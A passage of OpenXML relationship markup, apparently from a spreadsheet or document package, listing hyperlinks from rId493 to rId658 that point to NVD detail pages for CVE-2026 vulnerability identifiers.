Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97545" TargetMode="External" Id="rId493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97546" TargetMode="External" Id="rId494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97547" TargetMode="External" Id="rId495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97549" TargetMode="External" Id="rId496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97550" TargetMode="External" Id="rId497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97551" TargetMode="External" Id="rId498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97552" TargetMode="External" Id="rId499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97553" TargetMode="External" Id="rId500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97554" TargetMode="External" Id="rId501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97556" TargetMode="External" Id="rId502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97558" TargetMode="External" Id="rId503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97559" TargetMode="External" Id="rId504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97560" TargetMode="External" Id="rId505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97561" TargetMode="External" Id="rId506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97563" TargetMode="External" Id="rId507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97564" TargetMode="External" Id="rId508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97565" TargetMode="External" Id="rId509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97566" TargetMode="External" Id="rId510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97567" TargetMode="External" Id="rId511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97568" TargetMode="External" Id="rId512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97569" TargetMode="External" Id="rId513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97571" TargetMode="External" Id="rId514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97572" TargetMode="External" Id="rId515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97574" TargetMode="External" Id="rId516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97581" TargetMode="External" Id="rId517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97582" TargetMode="External" Id="rId518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97585" TargetMode="External" Id="rId519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97586" TargetMode="External" Id="rId520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97587" TargetMode="External" Id="rId521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97588" TargetMode="External" Id="rId522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97590" TargetMode="External" Id="rId523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97591" TargetMode="External" Id="rId524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97592" TargetMode="External" Id="rId525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97593" TargetMode="External" Id="rId526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97596" TargetMode="External" Id="rId527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97597" TargetMode="External" Id="rId528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97598" TargetMode="External" Id="rId529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97599" TargetMode="External" Id="rId530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97600" TargetMode="External" Id="rId531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97601" TargetMode="External" Id="rId532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97603" TargetMode="External" Id="rId533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97604" TargetMode="External" Id="rId534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97605" TargetMode="External" Id="rId535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97606" TargetMode="External" Id="rId536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97607" TargetMode="External" Id="rId537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97610" TargetMode="External" Id="rId538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97613" TargetMode="External" Id="rId539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97614" TargetMode="External" Id="rId540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97615" TargetMode="External" Id="rId541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97616" TargetMode="External" Id="rId542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97617" TargetMode="External" Id="rId543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97618" TargetMode="External" Id="rId544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97619" TargetMode="External" Id="rId545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97620" TargetMode="External" Id="rId546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97621" TargetMode="External" Id="rId547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97622" TargetMode="External" Id="rId548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97899" TargetMode="External" Id="rId549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97900" TargetMode="External" Id="rId550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97901" TargetMode="External" Id="rId551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97902" TargetMode="External" Id="rId552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97904" TargetMode="External" Id="rId553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97905" TargetMode="External" Id="rId554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97906" TargetMode="External" Id="rId555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97907" TargetMode="External" Id="rId556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97908" TargetMode="External" Id="rId557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97909" TargetMode="External" Id="rId558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97912" TargetMode="External" Id="rId559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97913" TargetMode="External" Id="rId560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97914" TargetMode="External" Id="rId561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97915" TargetMode="External" Id="rId562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97916" TargetMode="External" Id="rId563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97917" TargetMode="External" Id="rId564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97918" TargetMode="External" Id="rId565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97919" TargetMode="External" Id="rId566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97920" TargetMode="External" Id="rId567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97921" TargetMode="External" Id="rId568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97922" TargetMode="External" Id="rId569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97923" TargetMode="External" Id="rId570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97924" TargetMode="External" Id="rId571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97925" TargetMode="External" Id="rId572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97927" TargetMode="External" Id="rId573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97928" TargetMode="External" Id="rId574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97929" TargetMode="External" Id="rId575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97930" TargetMode="External" Id="rId576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97932" TargetMode="External" Id="rId577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97933" TargetMode="External" Id="rId578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97934" TargetMode="External" Id="rId579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97935" TargetMode="External" Id="rId580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97936" TargetMode="External" Id="rId581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97938" TargetMode="External" Id="rId582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97939" TargetMode="External" Id="rId583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97942" TargetMode="External" Id="rId584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97943" TargetMode="External" Id="rId585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97944" TargetMode="External" Id="rId586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97945" TargetMode="External" Id="rId587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97946" TargetMode="External" Id="rId588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97947" TargetMode="External" Id="rId589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97948" TargetMode="External" Id="rId590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97949" TargetMode="External" Id="rId591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97950" TargetMode="External" Id="rId592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97951" TargetMode="External" Id="rId593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97952" TargetMode="External" Id="rId594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97954" TargetMode="External" Id="rId595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97955" TargetMode="External" Id="rId596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97956" TargetMode="External" Id="rId597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97958" TargetMode="External" Id="rId598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97959" TargetMode="External" Id="rId599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97960" TargetMode="External" Id="rId600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97961" TargetMode="External" Id="rId601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97962" TargetMode="External" Id="rId602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97963" TargetMode="External" Id="rId603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97964" TargetMode="External" Id="rId604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97965" TargetMode="External" Id="rId605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97966" TargetMode="External" Id="rId606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97967" TargetMode="External" Id="rId607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97968" TargetMode="External" Id="rId608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97969" TargetMode="External" Id="rId609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97970" TargetMode="External" Id="rId610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97972" TargetMode="External" Id="rId611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97973" TargetMode="External" Id="rId612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97974" TargetMode="External" Id="rId613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97975" TargetMode="External" Id="rId614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97976" TargetMode="External" Id="rId615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97977" TargetMode="External" Id="rId616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97978" TargetMode="External" Id="rId617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97979" TargetMode="External" Id="rId618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97980" TargetMode="External" Id="rId619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97981" TargetMode="External" Id="rId620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97982" TargetMode="External" Id="rId621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97983" TargetMode="External" Id="rId622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97984" TargetMode="External" Id="rId623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97985" TargetMode="External" Id="rId624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97986" TargetMode="External" Id="rId625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97987" TargetMode="External" Id="rId626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97988" TargetMode="External" Id="rId627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97989" TargetMode="External" Id="rId628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97992" TargetMode="External" Id="rId629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97993" TargetMode="External" Id="rId630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97994" TargetMode="External" Id="rId631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97995" TargetMode="External" Id="rId632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97996" TargetMode="External" Id="rId633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97997" TargetMode="External" Id="rId634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97998" TargetMode="External" Id="rId635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98000" TargetMode="External" Id="rId636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98001" TargetMode="External" Id="rId637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98003" TargetMode="External" Id="rId638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98004" TargetMode="External" Id="rId639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98005" TargetMode="External" Id="rId640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98006" TargetMode="External" Id="rId641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98007" TargetMode="External" Id="rId642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98008" TargetMode="External" Id="rId643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98009" TargetMode="External" Id="rId644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98010" TargetMode="External" Id="rId645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98011" TargetMode="External" Id="rId646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98012" TargetMode="External" Id="rId647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98013" TargetMode="External" Id="rId648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98014" TargetMode="External" Id="rId649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98015" TargetMode="External" Id="rId650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98016" TargetMode="External" Id="rId651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98018" TargetMode="External" Id="rId652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98019" TargetMode="External" Id="rId653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98020" TargetMode="External" Id="rId654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98021" TargetMode="External" Id="rId655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98022" TargetMode="External" Id="rId656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98024" TargetMode="External" Id="rId657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98025" TargetMode="External" Id="rId658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 